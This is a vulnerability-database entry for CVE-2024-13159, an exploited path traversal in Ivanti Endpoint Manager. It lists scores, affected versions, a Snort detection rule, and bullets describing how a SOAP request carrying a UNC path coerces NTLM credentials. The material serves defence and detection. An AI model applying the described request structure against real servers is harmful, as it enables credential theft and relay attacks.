cbcvebase.
CVE-2024-13159
published 2025-01-14

CVE-2024-13159: Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated…

PriorityP188high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-03-31
Exploited in the wild
EPSS
99.76%
100.0th percentile
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.

Affected

3 ranges
VendorProductVersion rangeFixed in
ivantiendpoint_manager< 20222022
ivantiendpoint_manager
ivantiendpoint_manager

Detection & IOCsextracted from sources · hover to see the quote

url/WSVulnerabilityCore/VulCore.asmx
commandPOST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
otherhttp.favicon.hash:362091310
othericon_hash="362091310"
bytes
|3c|wildcard|3e 5c 5c 5c 5c|
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti EPM Absolute Path Traversal (CVE-2024-13159)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/WSVulnerabilityCore/VulCore.asmx"; fast_pattern; http.header; to_lowercase; content:"soapaction|3a 20|"; content:"gethashforwildcardrecursive"; distance:0; http.request_body; content:"|3c|wildcard|3e 5c 5c 5c 5c|"; reference:url,www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/; reference:cve,2024-13159; classtype:web-application-attack; sid:2060232; rev:1; metadata:affected_product Ivanti, attack_target Server, created_at 2025_02_20, cve CVE_2024_13159, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit targets the GetHashForWildcardRecursive SOAP endpoint via POST to /WSVulnerabilityCore/VulCore.asmx with a UNC path in the wildcard parameter to coerce NTLM authentication from the EPM server.
  • Detect exploit attempts by matching HTTP POST to /WSVulnerabilityCore/VulCore.asmx with SOAPAction header containing 'gethashforwildcardrecursive' and request body containing the wildcard element with UNC path prefix (\\).
  • Use out-of-band (OOB) DNS interaction detection (e.g., interactsh) to confirm successful NTLM coercion — a DNS callback from the EPM server to an attacker-controlled host indicates exploitation.
  • Proof-of-concept exploits released by Horizon3.ai can be used in relay attacks for unauthenticated coercion of Ivanti EPM machine credentials.
  • ·The Nuclei template uses a randomized filename variable (rand_text_alpha) and an interactsh callback URL as the UNC target, meaning no static IOC for the UNC path itself is available — detection must rely on the structural pattern of the SOAP request body.
  • ·The Snort rule (sid:2060232) is scoped to both Perimeter and Internal deployment, reflecting that the attacker requires no authentication and can reach the endpoint from external networks.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck9.8CRITICAL
cisa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.